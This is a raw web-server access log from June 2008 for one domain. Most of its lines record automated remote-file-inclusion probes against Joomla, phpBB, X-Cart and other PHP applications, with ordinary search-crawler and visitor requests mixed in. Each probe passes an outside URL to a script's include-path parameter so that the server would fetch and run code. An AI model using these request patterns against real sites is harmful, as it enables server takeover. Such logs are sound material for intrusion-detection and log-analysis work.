195.12.53.176 - - [17/Jun/2008:11:18:40 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:18:40 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:18:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:18:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:19:35 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:19:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:11:19:41 -0700] "GET //claroline/inc/lib/event/init_event_manager.inc.php?includePath=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:11:19:41 -0700] "GET /logs//claroline/inc/lib/event/init_event_manager.inc.php?includePath=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:20:30 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:20:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:20:32 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:20:33 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:20:38 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:11:21:08 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:21:23 -0700] "GET /logs/access_080126.log/include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:21:23 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:21:24 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:21:26 -0700] "GET /logs/access_080216.log/include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:21:35 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:21:41 -0700] "GET /logs/access_080322.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:21:46 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:21:47 -0700] "GET /logs/access_080418.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:21:47 -0700] "GET /logs/access_080418.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:21:59 -0700] "GET /logs/access_071216.log/errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:22:00 -0700] "GET /errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:22:00 -0700] "GET /logs/errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:22:02 -0700] "GET /logs/access_071218.log/errors.php?error=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:22:07 -0700] "GET /logs/access_071216.log/errors.php?error=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:22:08 -0700] "GET /errors.php?error=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:22:08 -0700] "GET /logs/errors.php?error=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.15.129.23 - - [17/Jun/2008:11:22:10 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.129.23 - - [17/Jun/2008:11:22:11 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.129.23 - - [17/Jun/2008:11:22:11 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:22:14 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:22:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.28 - - [17/Jun/2008:11:22:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:22:18 -0700] "GET //errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:22:19 -0700] "GET /logs/access_080131.log/errors.php?error=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:22:29 -0700] "GET /logs/access.log//?page=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:22:30 -0700] "GET /logs/access.log//?pg=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.28 - - [17/Jun/2008:11:22:33 -0700] "GET /blog/index.php/2008/04/ HTTP/1.1" 200 10287 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:22:43 -0700] "GET /logs/access.log//?pag=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:23:01 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:23:01 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:23:19 -0700] "GET /logs/access.log//?p=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:23:38 -0700] "GET /logs/access_080513.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:23:38 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:23:38 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:23:51 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:23:52 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:24:02 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:24:02 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:24:04 -0700] "GET /logs/include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:24:04 -0700] "GET /include/libchart-1.1/libchart.php?tm_includepath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:24:08 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:24:09 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:24:19 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:24:19 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:24:22 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:24:23 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:24:29 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:24:29 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:24:30 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.26 - - [17/Jun/2008:11:24:38 -0700] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:24:55 -0700] "GET //errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:24:56 -0700] "GET /logs//errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:24:57 -0700] "GET /logs//errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:25:00 -0700] "GET //errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:25:21 -0700] "GET /index.php?id=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 200 18413 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.32 - - [17/Jun/2008:11:25:28 -0700] "GET /logs/erros.php?error=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.32 - - [17/Jun/2008:11:25:28 -0700] "GET /erros.php?error=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:25:32 -0700] "GET /index.php?pg=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 200 18413 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:25:52 -0700] "GET /index.php?id=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 200 18413 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:25:59 -0700] "GET /logs/prepare.php?xcart_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:25:59 -0700] "GET /prepare.php?xcart_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
206.221.179.200 - - [17/Jun/2008:11:26:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arg0.altervista.org/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
206.221.179.200 - - [17/Jun/2008:11:26:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arg0.altervista.org/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:26:29 -0700] "GET /logs/access_080312.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:27:18 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:27:18 -0700] "GET //language.inc.php?langs_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:27:20 -0700] "GET /logs//language.inc.php?langs_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:27:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arg0.altervista.org/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:27:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arg0.altervista.org/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:28:02 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:28:02 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:28:07 -0700] "GET //include.php?path[docroot]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:28:07 -0700] "GET /logs//include.php?path[docroot]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:28:18 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:28:19 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:28:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:28:24 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:28:24 -0700] "GET //errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:11:28:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:28:49 -0700] "GET /logs/access.log/main.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:28:49 -0700] "GET /main.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:28:49 -0700] "GET /logs/main.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.58.157 - - [17/Jun/2008:11:28:54 -0700] "GET /logs/access_080312.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:28:57 -0700] "GET /logs//include.php?path[docroot]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:28:57 -0700] "GET //include.php?path[docroot]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:29:06 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:29:07 -0700] "GET //errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:29:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:29:11 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:29:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:42 -0700] "GET /presto/ HTTP/1.0" 200 510 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:43 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:51 -0700] "GET / HTTP/1.0" 200 18225 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:51 -0700] "GET / HTTP/1.0" 200 18241 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:52 -0700] "GET / HTTP/1.0" 200 18241 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:52 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
